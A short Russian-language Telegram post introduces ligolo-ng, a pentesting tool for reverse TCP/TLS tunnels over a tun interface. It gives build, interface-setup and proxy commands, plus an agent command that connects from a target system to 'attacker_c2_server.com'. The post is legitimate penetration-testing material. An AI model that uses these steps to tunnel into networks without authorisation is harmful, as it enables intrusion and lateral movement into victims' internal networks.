Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.
Например, для TCP-соединения процесс работает следующим образом:
Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.
Можно произвести установку из репозитория Kali Linux :
apt install ligolo-ng. Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert
./proxy -selfcert
После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601
После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000
Через команду
session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.#tools #tun #pentest #network
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍8🔥6